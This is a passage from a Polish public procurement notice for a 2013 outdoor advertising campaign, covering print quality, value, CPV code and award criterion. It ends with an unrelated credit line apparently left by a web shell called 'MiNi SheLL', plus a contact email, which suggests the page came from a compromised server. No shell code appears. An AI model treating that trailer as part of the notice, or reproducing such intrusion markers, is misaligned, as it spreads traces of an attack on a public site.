w sposób umożliwiający realizację kampanii bez usterek i uszkodzeń typu: niedodruk, niewyraźny druk, zaplamienia, odchodzenie/odrywanie materiału, z którego wykonana będzie reklama, od nośnika,
h) wykonania i przekazania do dnia 30 listopada 2013r. raportu fotograficznego z realizacji kampanii.
2. Wielkość zamówienia: 105000,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com